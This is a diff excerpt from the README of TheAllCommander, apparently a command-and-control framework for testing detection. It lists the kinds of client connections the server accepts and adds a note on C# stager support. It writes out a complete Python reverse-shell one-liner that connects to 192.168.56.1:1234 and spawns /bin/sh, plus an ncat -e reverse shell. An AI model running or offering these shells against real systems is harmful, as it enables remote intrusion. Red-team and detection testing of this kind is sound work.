matt-handy/TheAllCommander/README.md

 3) "Python oneliner" ->  TheAllCommander can receive connections from python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"192.168.56.1\",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call ([\"/bin/sh\",\"-i\"]);'
 		Note: This has been tested with /bin/sh and the $ will be removed to normalize IO with a Linux ncat shell
 4) ncat <ip> <port> -e cmd | /bin/bash -> works on both Linux and Windows
+5) TheAllCommander has been augmented with the ability to parse C# code and serve it to a C# stager.
+At present, only a harmless "Hello World" example is provided to demonstrate client-side indicators of compromise.
+See "C# Staging" below.
-5) The author has developed C++ and C# payloads which are available only for limited release.
+6) The author has developed C++ and C# payloads which are available only for limited release.
 Until a framework for public release can be developed, they will be held for release on an individually assessed basis.

 # Commands
 The following commands are supported in the default protocol test daemon: